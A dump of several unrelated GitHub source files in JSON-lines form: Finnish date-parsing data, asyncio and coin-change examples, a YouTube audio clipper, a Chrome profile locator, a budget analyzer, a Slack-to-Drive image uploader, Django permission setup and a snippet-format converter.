\"(\\\\d+[.,]?\\\\d*) sekunti sitten\",\n \"(\\\\d+[.,]?\\\\d*) sekuntia sitten\"\n ],\n \"\\\\1 week ago\": [\n \"(\\\\d+[.,]?\\\\d*) viikko sitten\",\n \"(\\\\d+[.,]?\\\\d*) viikkoa sitten\",\n \"(\\\\d+[.,]?\\\\d*) vk sitten\"\n ],\n \"\\\\1 year ago\": [\n \"(\\\\d+[.,]?\\\\d*) v sitten\",\n \"(\\\\d+[.,]?\\\\d*) vuosi sitten\",\n \"(\\\\d+[.,]?\\\\d*) vuotta sitten\"\n ],\n \"in \\\\1 day\": [\n \"(\\\\d+[.,]?\\\\d*) pv päästä\",\n \"(\\\\d+[.,]?\\\\d*) päivän päästä\"\n ],\n \"in \\\\1 hour\": [\n \"(\\\\d+[.,]?\\\\d*) t päästä\",\n \"(\\\\d+[.,]?\\\\d*) tunnin päästä\"\n ],\n \"in \\\\1 minute\": [\n \"(\\\\d+[.,]?\\\\d*) min päästä\",\n \"(\\\\d+[.,]?\\\\d*) minuutin päästä\"\n ],\n \"in \\\\1 month\": [\n \"(\\\\d+[.,]?\\\\d*) kk päästä\",\n \"(\\\\d+[.,]?\\\\d*) kuukauden päästä\"\n ],\n \"in \\\\1 second\": [\n \"(\\\\d+[.,]?\\\\d*) s päästä\",\n \"(\\\\d+[.,]?\\\\d*) sekunnin päästä\"\n ],\n \"in \\\\1 week\": [\n \"(\\\\d+[.,]?\\\\d*) viikon päästä\",\n \"(\\\\d+[.,]?\\\\d*) vk päästä\"\n ],\n \"in \\\\1 year\": [\n \"(\\\\d+[.,]?\\\\d*) v päästä\",\n \"(\\\\d+[.,]?\\\\d*) vuoden päästä\"\n ]\n },\n \"locale_specific\": {},\n \"skip\": [\n \":n\",\n \" \",\n \"'\",\n \",\",\n \"-\",\n \".\",\n \"/\",\n \";\",\n \"@\",\n \"[\",\n \"]\",\n \"|\",\n \",\"\n ],\n \"sentence_splitter_group\": 1,\n \"ago\": [\n \"sitten\"\n ],\n \"in\": [\n \"kuluttua\",\n \"päästä\"\n ],\n \"simplifications\": [\n {\n \"(\\\\d+[.,]?\\\\d*) (sekunnin|sekuntin|minuutin|tunnin|päivän|viikon|kuukauden|vuoden) (päästä|kuluttua)\": \"\\\\3 \\\\1 \\\\2\"\n }\n ]\n}\n","repo_name":"scrapinghub/dateparser","sub_path":"dateparser/data/date_translation_data/fi.py","file_name":"fi.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"fi","doc_type":"code","stars":2374,"dataset":"github-code","pt":"79"} +{"seq_id":"11896831132","text":"import asyncio\n\n\nasync def say_what(delay, name):\n await asyncio.sleep(delay)\n return f'Say what {name}'\n\n\nasync def main():\n print(asyncio.all_tasks())\n tasks1 = asyncio.create_task(say_what(2, 'Dave'))\n tasks2 = asyncio.create_task(say_what(1, 'Matt'))\n await tasks1\n await tasks2\n print(f'Result task {tasks1.result()}')\n print(f'Result task {tasks2.result()}')\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Gusakovskiy/goit_python_web","sub_path":"module_6/example_tasks.py","file_name":"example_tasks.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30419331847","text":"from leezy import Solution, solution\n\n\nclass Q322(Solution):\n\n @solution\n def change_2D(self, coins, amount):\n # 1696ms 14.85%\n # this shares the similar pattern with 518. unbounded knapsack problem\n # dp[i][j] means minimum coins to sum up to amount j using coins[i:]\n # dp[i][j] = min(dp[i-1][j], dp[i][j-coin]+1)\n N, MAX = len(coins), amount + 1\n dp = [[MAX] * (amount+1) for _ in range(N+1)]\n for i in range(N+1):\n dp[i][0] = 0\n for i in range(1, N+1):\n coin = coins[i-1]\n for j in range(1, amount+1):\n dp[i][j] = dp[i-1][j] # do not use current coin\n if j >= coin:\n # use current coin\n dp[i][j] = min(dp[i][j], dp[i][j-coin]+1)\n return dp[N][amount] if dp[N][amount] != MAX else -1\n\n @solution\n def change_1D(self, coins, amount):\n # 960ms 81.72%\n MAX = amount + 1\n dp = [MAX] * (amount+1)\n dp[0] = 0\n for coin in coins:\n for j in range(coin, amount+1):\n dp[j] = min(dp[j], dp[j-coin]+1)\n return dp[amount] if dp[amount] != MAX else -1\n\n @solution\n def coinChange(self, coins, amount):\n # 1068ms\n if amount < 0:\n return -1\n coins = sorted(coins)\n dp = [0] + [float('inf')] * amount\n for i in range(1, amount+1):\n for c in coins:\n if c > i:\n break\n dp[i] = min(dp[i], dp[i-c]+1)\n return dp[amount] if dp[amount] != float('inf') else -1\n\n @solution\n def coin_change(self, coins, amount):\n # 1996ms\n memo = {}\n coins = sorted(coins)\n r = self.dfs(coins, amount, memo)\n return r if r != float('inf') else -1\n\n def dfs(self, coins, amount, memo):\n if amount == 0:\n return 0\n if amount in memo:\n return memo[amount]\n\n r = float('inf')\n for c in coins:\n if c > amount:\n break\n r = min(r, self.dfs(coins, amount - c, memo)+1)\n memo[amount] = r\n return r\n\n @solution\n def coin_change_prune(self, coins, amount):\n least = [float('inf')]\n coins = sorted(coins, reverse=True)\n self.dfs_prune_boilerplate(coins, 0, amount, 0, least)\n return least[0] if least[0] != float('inf') else -1\n\n def dfs_prune(self, coins, s, amount, count, least):\n # 144ms 99.23%\n c = coins[s]\n if s == len(coins) - 1: # quit earlier\n if amount % c == 0:\n least[0] = min(least[0], count + amount // c)\n else:\n for k in range(amount // c, -1, -1):\n if count + k >= least[0]: # !! important\n break\n self.dfs_prune(coins, s+1, amount - k*c, count+k, least)\n\n def dfs_prune_boilerplate(self, coins, s, amount, count, least):\n # 192ms\n if s >= len(coins):\n if amount == 0:\n least[0] = min(least[0], count)\n return\n c = coins[s]\n for k in range(amount // c, -1, -1):\n if count + k >= least[0]:\n break\n self.dfs_prune_boilerplate(\n coins, s+1, amount - k*c, count+k, least)\n\n\ndef main():\n q = Q322()\n q.add_args([1, 2, 5], 11)\n q.add_args([1, 2, 5], 0)\n q.add_args([1, 2, 5], 53)\n q.add_args([2, 5], 1)\n q.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aptend/leetcode-rua","sub_path":"Python/322 - Coin Change/322_coin-change.py","file_name":"322_coin-change.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"73255180735","text":"import os\n\nfrom pydub import AudioSegment\nfrom pytube import YouTube\nfrom pytube.cli import on_progress\nimport shutil\n\n\ndef replaceCharacters(str):\n '''\n Drops reserved characters from string.\n Source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?redirectedfrom=MSDN\n '''\n skipChars = \"`~!@#$%^&*()_+=-|}{[]\\;':?>mm:ss, mm:ss\n trackTitle (str): \tTitle of the YouTube video\t\t\t\t\n '''\n if not os.path.exists('./trackfiles/'+trackTitle):\n os.makedirs('./trackfiles/'+trackTitle)\n count = 0\n print(\"\\n---Clipping Audio to Time Stamps!---\")\n for line in timeStamp[1:]:\n times = line.split(',')\n start, finish = times[0], times[1]\n\n startMin, startSec = (start.split(':'))\n finishMin, finishSec = (finish.split(':'))\n\n startTime = (int(startMin) * 60 + int(startSec)) * 1000\n finishTime = (int(finishMin) * 60 + int(finishSec)) * 1000\n # try:\n cutAudio = audioFile[startTime:finishTime]\n cutAudio.export(\n f\"{downloadPath}/{trackTitle}/{exportName}{count}.mp3\", format=\"mp3\")\n # except:\n # print(\"Couldn't export clip of time stamp: {start}-{finish}\")\n\n count = count + 1\n print(\"\\n---Clipping Complete---\")\n\n\nif __name__ == \"__main__\":\n file = open('Link.txt', 'r')\n lines = file.readlines()\n link = lines[0]\n\n print(\"YouTube link received: \" + link, end='')\n downloadPath = os.path.join(os.getcwd(), \"downloads\")\n\n trackTitle = download(link, downloadPath)\n\n reqPath = os.path.join(\n os.getcwd(), \"downloads\", trackTitle, trackTitle.replace(',', '') + \".mp4\")\n audioFile = AudioSegment.from_file(reqPath, \"mp4\")\n\n exportName = trackTitle.split(' ')[0]\n clipAudio(audioFile, lines, trackTitle, downloadPath)\n shutil.copy2('Link.txt', os.path.join(downloadPath, trackTitle))\n","repo_name":"gauravshilpakar/DeceptionDetection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33827613032","text":"import json\nimport logging\nimport os\nimport sqlite3\nimport sys\nfrom enum import Enum, auto\nfrom pathlib import Path\nfrom typing import ClassVar, Dict, List, Optional, Set, Tuple\n\nfrom attr import field\nfrom attrs import define\n\nfrom automsr.config import validate_email\n\nlogger = logging.getLogger(__name__)\n\nENV_HOME = os.environ.get(\"HOME\")\nENV_LOCALAPPDATA = os.environ.get(\"LOCALAPPDATA\")\n\n\nclass ChromeVariant(Enum):\n \"\"\"\n Chrome variants available\n \"\"\"\n\n CHROME = auto()\n CHROME_BETA = auto()\n CHROME_CANARY = auto()\n CHROMIUM = auto()\n\n\nclass OutputFormat(Enum):\n \"\"\"\n Types of output formats available for printing found Chrome profiles o stdout.\n \"\"\"\n\n LIST = \"list\"\n JSON = \"json\"\n PRETTY_JSON = \"pretty-json\"\n\n\ndef get_platform() -> str:\n \"\"\"\n Returns a simplified version of the system platform in use.\n \"\"\"\n\n retval = \"linux\" # assumes linux env if not win32 or darwin\n\n if sys.platform.startswith(\"win32\"):\n retval = \"windows\"\n elif sys.platform.startswith(\"darwin\"):\n retval = \"macOS\"\n\n return retval\n\n\n@define\nclass ChromeProfile:\n displayed_name: str\n path: Path\n\n RESERVED_NAMES = [\"System Profile\", \"Guest Profile\"]\n\n def as_dict(self) -> Dict[str, str]:\n return dict(displayed_name=self.displayed_name, path=str(self.path.resolve()))\n\n @classmethod\n def from_directory(cls, path: Path) -> Optional[\"ChromeProfile\"]:\n \"\"\"\n Returns a Chrome Profile based on a directory.\n\n Returns `None` if the provided `path` is not a valid Chrome Profile.\n \"\"\"\n\n # If the provided path is not an existing directory, returns None\n if not path.is_dir():\n return None\n\n # If the directory name is one of the reserved name for Google profiles\n # not matching any user profile, returns None\n if path.name in cls.RESERVED_NAMES:\n return None\n\n # If this file doesn't exist, it's not a profile\n preferences_path = path / \"Preferences\"\n if not preferences_path.is_file():\n return None\n\n preferences_dict = json.load(open(preferences_path, encoding=\"utf-8\"))\n displayed_name = preferences_dict.get(\"profile\", {}).get(\"name\", \"\")\n return cls(displayed_name=displayed_name, path=path)\n\n def get_email(self) -> Optional[str]:\n \"\"\"\n Try to get the Outlook email address from the profile data.\n \"\"\"\n\n allowed_domains = {\"outlook\", \"live\", \"hotmail\", \"msn\"}\n\n @define(order=True, frozen=True)\n class Record:\n email: str = field(order=False)\n timestamp: int\n\n @classmethod\n def from_row(cls, row: Tuple[str, str]) -> Optional[\"Record\"]:\n \"\"\"\n Parse a row obtained from the Login Data database of Chrome.\n\n If the row is not compatible with our criteria, returns None.\n \"\"\"\n\n assert len(row) == 2\n email_value: str = row[0]\n timestamp_value: int = int(row[1])\n\n if not validate_email(email_value, raise_on_error=False):\n return None\n\n domain = email_value.split(\"@\")[1].split(\".\")[0]\n if domain not in allowed_domains:\n return None\n\n return cls(email=email_value, timestamp=timestamp_value)\n\n # TODO check if this path is valid for every OS\n login_database: Path = self.path / \"Login Data\"\n if not login_database.is_file():\n logger.debug(\"No login database found: %s\", login_database)\n return None\n\n with sqlite3.connect(login_database) as conn:\n cur = conn.execute(\n \"\"\"\\\n select t.username_value, t.date_last_used\n from main.logins t\n where t.username_value <> ''\n and t.origin_url like '%live.com%';\"\"\"\n )\n all_rows: List[Tuple[str, str]] = cur.fetchall()\n\n valid_records: List[Optional[Record]] = [\n Record.from_row(row=row) for row in all_rows\n ]\n valid_non_null_records: List[Record] = [\n record for record in valid_records if record is not None\n ]\n unique_emails: Set[str] = {record.email for record in valid_non_null_records}\n logger.debug(\"Outlook emails found: %s\", unique_emails)\n\n if not unique_emails:\n logger.debug(\"No Outlook email found!\")\n return None\n elif len(unique_emails) > 1:\n logger.debug(\n \"More than one Outlook email found! Will return the latest email used.\"\n )\n latest_record: Record = max(valid_non_null_records)\n return latest_record.email\n else:\n logger.debug(\"Found only one Outlook email.\")\n return unique_emails.pop()\n\n\n@define\nclass ProfilesExecutor:\n chrome_variant: ChromeVariant = ChromeVariant.CHROME\n profiles_root_path: Optional[Path] = None\n\n # source: https://chromium.googlesource.com/chromium/src/+/master/docs/user_data_dir.md#default-location\n CHROME_DEFAULT_PROFILES_LOCATIONS: ClassVar[\n Dict[str, Dict[ChromeVariant, Path]]\n ] = {\n \"macOS\": {\n ChromeVariant.CHROME: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome\"\n ),\n ChromeVariant.CHROME_BETA: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome Beta\"\n ),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_HOME}/Library/Application Support/Google/Chrome Canary\"\n ),\n ChromeVariant.CHROMIUM: Path(\n f\"{ENV_HOME}/Library/Application Support/Chromium\"\n ),\n },\n \"windows\": {\n ChromeVariant.CHROME: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome\\\\User Data\"\n ),\n ChromeVariant.CHROME_BETA: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome Beta\\\\User Data\"\n ),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_LOCALAPPDATA}\\\\Google\\\\Chrome SxS\\\\User Data\"\n ),\n ChromeVariant.CHROMIUM: Path(f\"{ENV_LOCALAPPDATA}\\\\Chromium\\\\User Data\"),\n },\n \"linux\": {\n ChromeVariant.CHROME: Path(f\"{ENV_HOME}/.config/google-chrome\"),\n ChromeVariant.CHROME_BETA: Path(f\"{ENV_HOME}/.config/google-chrome-beta\"),\n ChromeVariant.CHROME_CANARY: Path(\n f\"{ENV_HOME}/.config/google-chrome-unstable\"\n ),\n ChromeVariant.CHROMIUM: Path(f\"{ENV_HOME}/.config/chromium\"),\n },\n }\n\n def get_profiles_root_path(self) -> Path:\n \"\"\"\n Based on current state, get the root path of Chrome profiles.\n \"\"\"\n\n if self.profiles_root_path is not None:\n logger.info(\n \"Profiles root path was manually set to: %s\", self.profiles_root_path\n )\n return self.profiles_root_path\n\n platform = get_platform()\n logger.debug(\"Platform to use: %s\", platform)\n logger.debug(\"Chrome variant to use: %s\", self.chrome_variant)\n\n profiles_root_path = self.CHROME_DEFAULT_PROFILES_LOCATIONS[platform][\n self.chrome_variant\n ]\n logger.info(\n \"Profiles root path was automatically found to be: %s\", profiles_root_path\n )\n return profiles_root_path\n\n def get_profiles(self) -> List[ChromeProfile]:\n \"\"\"\n Return the list of Chrome profiles found.\n \"\"\"\n\n root_path = self.get_profiles_root_path()\n\n # Safety check\n if not root_path.exists():\n raise FileNotFoundError(root_path)\n\n chrome_profiles: List[ChromeProfile] = []\n\n for directory in root_path.iterdir():\n chrome_profile = ChromeProfile.from_directory(path=directory)\n if chrome_profile is None:\n continue\n\n logger.info(\"Found Chrome profile: %s\", chrome_profile)\n chrome_profiles.append(chrome_profile)\n\n return chrome_profiles\n\n def print_profiles(self, output_format: OutputFormat = OutputFormat.LIST) -> None:\n \"\"\"\n Get the list of Chrome profiles found, then print it to stdout.\n\n It's possible to specify a type for printing the values obtained to stdout.\n \"\"\"\n\n profiles: List[ChromeProfile] = self.get_profiles()\n\n if output_format is OutputFormat.LIST:\n data = \"\\n\".join([str(profile) for profile in profiles])\n\n elif output_format is OutputFormat.JSON:\n data = json.dumps([profile.as_dict() for profile in profiles])\n\n elif output_format is OutputFormat.PRETTY_JSON:\n data = json.dumps([profile.as_dict() for profile in profiles], indent=4)\n\n else:\n raise ValueError(output_format)\n\n data += \"\\n\" # add manually a final newline\n sys.stdout.write(data)\n","repo_name":"Crissal1995/automsr","sub_path":"automsr/browser/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":9043,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"28346307557","text":"import os\nimport csv\n\nfile_path = os.path.join(\"Resources\", \"budget_data.csv\")\n\ndef average(numbers):\n\n average = sum(numbers)/len(numbers)\n return average\n\ndef to_currency(value):\n return '${:,}'.format(value)\n\nwith open(file_path, 'r') as csvfile:\n budget_data_reader = csv.reader(csvfile, delimiter=',')\n\n budget_data_header = next(budget_data_reader)\n\n total_months = 0\n net_total_profit_loss = 0\n change_in_profit_loss = []\n months = []\n\n previous_profit_loss = 0\n\n for row in budget_data_reader:\n # Adding another month to the list of total months counted\n total_months += 1\n # Adding to the total net profit loss\n net_total_profit_loss += int(row[1])\n # Appending the date of the record\n months.append(row[0])\n # Calculating the change in profit loss from the previous month to the next month\n next_profit_loss = int(row[1])\n\n change_in_profit_loss.append(next_profit_loss - previous_profit_loss)\n\n previous_profit_loss = int(row[1])\n # Removing the first profit/loss because we don't have a previous month\n change_in_profit_loss.pop(0)\n average_change = average(change_in_profit_loss)\n\n max_profit_change = max(change_in_profit_loss)\n min_loss_change = min(change_in_profit_loss)\n\n max_profit_change_index = change_in_profit_loss.index(max_profit_change) + 1\n min_loss_change_index = change_in_profit_loss.index(min_loss_change) + 1\n\n max_profit_month = months[max_profit_change_index]\n min_loss_month = months[min_loss_change_index]\n\n net_total_profit_loss_currency = to_currency(net_total_profit_loss)\n\n \n\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: {net_total_profit_loss_currency}\")\nprint(\"Average Change: $%.2f\" % average_change)\nprint(f\"Greatest Increase in Profits: {max_profit_month} (${max_profit_change})\")\nprint(f\"Greatest Decrease in Profits: {min_loss_month} (${min_loss_change})\")\n\noutput_path = os.path.join(\"financial_analysis.txt\")\n\nwith open(output_path, 'w') as txtfile:\n txtfile.write(\"Financial Analysis\\n\")\n txtfile.write(\"----------------------------\\n\")\n txtfile.write(f\"Total Months: {total_months}\\n\")\n txtfile.write(f\"Total: {net_total_profit_loss_currency}\\n\")\n txtfile.write(f\"Average Change: $%.2f\" % average_change + \"\\n\")\n txtfile.write(f\"Greatest Increase in Profits: {max_profit_month} (${max_profit_change})\\n\")\n txtfile.write(f\"Greatest Decrease in Profits: {min_loss_month} (${min_loss_change})\")\n\n txtfile.close()","repo_name":"camiloibanez/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"20199481162","text":"'''\nCreated on Mar 6, 2021\n\nMake a two-player Rock-Paper-Scissors game. \n(Hint: Ask for player plays (using input), \ncompare them, print out a message of congratulations to the winner)\n\nRemember the rules:\n\nRock beats scissors\nScissors beats Paper\nPaper beats Rock\n\n@author: lindseymerwin\n'''\n\n \n\n \n\n\ndef rock_paper_scissors():\n# each player selects their first move\n player1 = input('Player 1 enter first move: ')\n player2 = input('Player 2 Enter first move: ')\n \n if player1 and player2 in moves:\n \n player1 = moves[player1]\n player2 = moves[player2]\n\n if player1 == 1:\n if player2 == 3:\n print('PLAYER 1 WINS!')\n \n elif player2 == 2:\n print('PLAYER 2 WINS')\n \n elif player2 == 1:\n print('CATS GAME') \n \n if player1 == 2:\n if player2 == 1:\n print('PLAYER 1 WINS!')\n \n elif player2 == 3:\n print('PLAYER 2 WINS')\n \n elif player2 == 2:\n print('CATS GAME') \n \n if player1 == 3:\n if player2 == 2:\n print('PLAYER 1 WINS!')\n \n elif player2 == 1:\n print('PLAYER 2 WINS')\n \n elif player2 == 3:\n print('CATS GAME') \n \n else:\n print('Invalid, must be rock, paper, or scissors')\n\n\n\nmoves = {'rock': 1, 'paper': 2, 'scissors': 3} # <-- gives options\nuser_moves = rock_paper_scissors()\n\n\n","repo_name":"Lindsey-Thompson/Rock_Paper_Scissors","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5350616599","text":"# -*- coding:utf-8 -*-\nimport requests\nimport json\nimport re\nimport shutil\nimport time\nfrom datetime import datetime, timedelta, timezone\nimport urllib.request, urllib.error\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n# IMAGE ID =================\n# ダウンロードするIDを設定する\nfile_id = \"*********\"\n# IMAGE ID =================\n\n# SLACK =================\n# slackのAPI/channel/ファイルの一覧を取得する\nslack_API_token = \"取得したAPI TOKEN KEY\"\nchannel = \"チャンネルID\"\n# SLACK =================\n\n# HEADERS =================\n# スクレイピング・クローリングする時のマナー的\nheaders = {\"User-Agent\": \"browsers:ブラウザ名, OS:OS名\"}\n# 追記するようにしてからアク禁ならなくなったかも\n# HEADERS =================\n\n# GOOGLE =================\n# Google認証を行う\ngauth = GoogleAuth()\ngauth.CommandLineAuth(GoogleAuth())\n\n# Google Driveのオブジェクトを得る --- (*1)\ndrive = GoogleDrive(gauth)\n\n # Drive内のフォルダID\nfolder_id = \"アップロード先となるGoogle Drive内のフォルダID\"\n# GOOGLE =================\n\n# slackからローカルにダウンロードする\ndef download_imgurl(url, file_name):\n res = requests.get(url, stream=True)\n if res.status_code == 200:\n with open(file_name, 'wb') as file:\n shutil.copyfileobj(res.raw, file)\n return 1\n else:\n return -1\n\n# 画像をダウンロードできるURLを取得する。\ndef get_img_url(slack_API_token, id_number):\n # 1) API files.sharedPublicURLを使う\n public_url = \"https://slack.com/api/files.sharedPublicURL?token=%s&file=%s&pretty=1\" % (slack_API_token, id_number)\n # 2) files.sharedPublicURLをutf-8に変換しstrで利用できる状態にする\n response_share = urllib.request.urlopen(public_url).read().decode(\"utf-8\")\n # 3) permalink_publicを検索し公開用URLの取得を可能にする正規表現をコンパイルする。\n pubhtml_pattern = re.compile(r'\\\"permalink_public\\\": \\\"([a-zA-Z0-9!-/:-@¥[-`{-~]+)\\\",\\n')\n # 4) pubhtml_patternを使い、公開用URLを取得。さらにその中に含まれるバックスラッシュ「\\」を取り除く。\n img_html_url = pubhtml_pattern.findall(response_share)[0].replace(\"\\\\\",\"\")\n # 5) 公開用URLにアクセスしソースを取得。strに変換する。\n response_get_img = urllib.request.urlopen(img_html_url).read().decode(\"utf-8\")\n # 6) 画像取得するための正規表現をコンパイルする。\n puburl_pattern = re.compile(r'\\n')\n # 7) 画像を表すタグimg src=~を取得する\n img_url = puburl_pattern.findall(response_get_img)[0]\n # 8) 取得した画像のURLを返す\n return img_url\n\n# ↑↑↑ここまで準備↑↑↑\n# ↓↓↓ここから処理↓↓↓\n\n# 投稿されている画像の情報を取得\nfile_list_url = \"https://slack.com/api/files.list?token=%s&pretty=1\" % (slack_API_token)\nresponse1 = requests.get(file_list_url, headers=headers)\njson_data = response1.json()\nimg_files = json_data['files']\n\n# Slackから画像をダウンロードする\ntry:\n print('I will download...')\n img_url = get_img_url(slack_API_token, file_id)\n download_imgurl(img_url, file_id + '.jpg')\n print('Download Complete!!')\nexcept:\n print('ERROR: ' + file_id + \" download failed.\")\n pass\n\n# オープンしてしまった公開用URLをクローズしてアクセスできない元の状態に戻す\nprint('Disable the URL...')\nrevoke_url = \"https://slack.com/api/files.revokePublicURL?token=%s&file=%s&pretty=1\" % (slack_API_token, file_id)\nresponse_revo = urllib.request.urlopen(revoke_url).read()\nprint('Disable Complete!!')\n\n\n# Driveへのアップロード処理\nimg_name = file_id + '.jpg'\nf = drive.CreateFile({\n 'title': img_name,\n 'mimeType': 'image/jpeg',\n 'parents': [{'kind': 'drive#fileLink', 'id':folder_id}]\n })\nf.SetContentFile(img_name)\nf.Upload()\nprint('Upload Complete!!')\n","repo_name":"flower81/imgUpload","sub_path":"photoSingle.py","file_name":"photoSingle.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29781772255","text":"from django.contrib.auth.models import Permission, Group\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\n\n\ndef get_permissions(model, permissions):\n \"\"\"Obtener permisos apartir de modelo y los diferentes permisos que hay en el sistema\"\"\"\n perm_q = Q()\n for perm in permissions:\n perm_q |= Q(codename=perm + '_' + model)\n return Permission.objects.filter(perm_q)\n\n\ndef create_special_permissions():\n \"\"\"Crear los permisos por defecto en el sistema (Permisos extra para los Vales de Solicitud y Movimiento)\"\"\"\n # Getting Content Type\n request_ticket_content_type = ContentType.objects.get(app_label='system', model='requestticket')\n movement_ticket_content_type = ContentType.objects.get(app_label='system', model='movementticket')\n\n # Creating permissions\n own_request_ticket, _ = Permission.objects.get_or_create(codename='own_requestticket',\n name='Can only view own Vale de Solicitud',\n content_type=request_ticket_content_type)\n own_movement_ticket, _ = Permission.objects.get_or_create(codename='own_movementticket',\n name='Can only view own Vale de Movimiento',\n content_type=movement_ticket_content_type)\n return own_request_ticket, own_movement_ticket\n\n\ndef create_default_groups():\n \"\"\"Crear los grupos de permisos por defecto (Administrador, Jefe de Departamento, Vicedecano)\"\"\"\n if Group.objects.filter(\n Q(name='Administrador') | Q(name='Jefe de Departamento') | Q(name='Vicedecano')).count() < 3:\n # Creo el grupo y le asigno los permisos correspondientes\n # Administrador\n admin, created = Group.objects.get_or_create(name='Administrador')\n if created:\n perm = ['view', 'add', 'change', 'delete']\n admin.permissions.set(get_permissions('user', perm) | get_permissions('group', perm))\n admin.save()\n\n # Jefe de Departamento\n jefe, created = Group.objects.get_or_create(name='Jefe de Departamento')\n if created:\n # Extract special permissions\n own_request_ticket, own_movement_ticket = create_special_permissions()\n\n perm = ['view', 'add', 'change', 'delete', 'own']\n jefe.permissions.set(get_permissions('basicmediumexpedient', ['view']) |\n get_permissions('movementticket', perm) | get_permissions('requestticket', perm))\n jefe.permissions.add(own_request_ticket)\n jefe.permissions.add(own_movement_ticket)\n jefe.save()\n\n # Vicedecano\n vicedecano, created = Group.objects.get_or_create(name='Vicedecano')\n if created:\n perm = ['view', 'add', 'change', 'delete']\n vicedecano.permissions.set(get_permissions('basicmediumexpedient', perm) |\n get_permissions('movementticket', perm) |\n get_permissions('requestticket', perm) |\n get_permissions('responsibilitycertificate', perm))\n vicedecano.save()\n","repo_name":"ISW-P5/Gestion-Medios-Basicos","sub_path":"system/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43566098909","text":"#!/usr/bin/python3\n\nimport argparse\nfrom xml.dom.minidom import parse, Document\nimport json\nimport re\nfrom sys import stderr, exit\nfrom abc import ABC, abstractmethod\n\n\nclass Editor(ABC):\n \"\"\" An abstract class for all the editors \"\"\"\n fpath = \"\"\n document = \"\"\n\n @abstractmethod\n def parse(self):\n pass\n\n @abstractmethod\n def create(self):\n pass\n\n @abstractmethod\n def write(self):\n pass\n\n\nclass IntelliJXML(Editor):\n \"\"\" A class to handle IntelliJ XML documents\"\"\"\n fpath = \"\"\n document = \"\"\n\n def __init__(self, path):\n self.fpath = path\n\n def parse(self):\n self.document = parse(self.fpath)\n\n def getBody(self, template):\n body = template.getAttribute(\"value\")\n\n # Get rid of double dollar signs and make them single dollar signs\n body = re.sub(r\"\\$([0-9]*)\\$\", r\"$\\1\", body)\n\n result = body.split(\"\\n\")\n return result\n\n def create(self):\n group = self.fpath[:-4]\n group = re.sub(r\"(.*/)\", r\"\", group)\n group = re.sub(r\"(.*\\\\)\", r\"\", group)\n group = re.sub(r\"(/.*/)\", r\"\", group)\n group = re.sub(r\"(\\\\.*\\\\)\", r\"\", group)\n\n self.document = Document()\n\n templateSet = self.document.createElement('templateSet')\n templateSet.setAttribute(\"group\", group)\n\n self.document.appendChild(templateSet)\n\n def add(self, context, name, value):\n # Add template\n template = self.document.createElement(\"template\")\n template.setAttribute(\"name\", value[\"prefix\"])\n template.setAttribute(\"description\", name)\n template.setAttribute(\"toReformat\", \"false\")\n template.setAttribute(\"toShortenFQNames\", \"true\")\n\n body = \"\\n\".join(value[\"body\"])\n\n # Find all variables\n vars = set()\n for var in [x.group() for x in re.finditer(r\"(\\$[0-9]+)\", body)]:\n vars.add(var)\n\n # Replace single dollar sign with encolsing dollar signs\n body = re.sub(r\"(\\$[0-9]+)\", r\"\\1$\", body)\n\n # Escape \\n\n body = body.replace(\"\\n\", \" \")\n\n template.setAttribute(\"value\", body)\n\n # Add all the variables in template\n for i in range(0, len(vars)):\n variable = self.document.createElement(\"variable\")\n variable.setAttribute(\"name\", str(i+1))\n variable.setAttribute(\"expression\", \"\")\n variable.setAttribute(\"defaultValue\", \"\")\n variable.setAttribute(\"alwaysStopAt\", \"true\")\n\n template.appendChild(variable)\n\n # Add context and option\n ctx = self.document.createElement(\"context\")\n option = self.document.createElement(\"option\")\n\n option.setAttribute(\"name\", context)\n option.setAttribute(\"value\", \"true\")\n\n # Append option to context\n ctx.appendChild(option)\n\n # Append context to template\n template.appendChild(ctx)\n\n # Append template to templateSet inside the XML document\n templateSet = self.document.getElementsByTagName(\"templateSet\")[0]\n templateSet.appendChild(template)\n\n def write(self):\n xmlString = self.document.toprettyxml().split(\n \"\\n\", 1)[1].replace(\"&#10;\", \" \")\n\n xmlFile = open(self.fpath, 'w')\n xmlFile.write(xmlString)\n xmlFile.close()\n\n\nclass VSCodeJSON(Editor):\n \"\"\" A class to handle VSCode JSON documents\"\"\"\n\n def __init__(self, path):\n self.fpath = path\n self.document = {}\n\n def create(self):\n pass\n\n def add(self, name, body):\n self.document[name] = {\"prefix\": name, \"body\": body}\n\n def write(self):\n 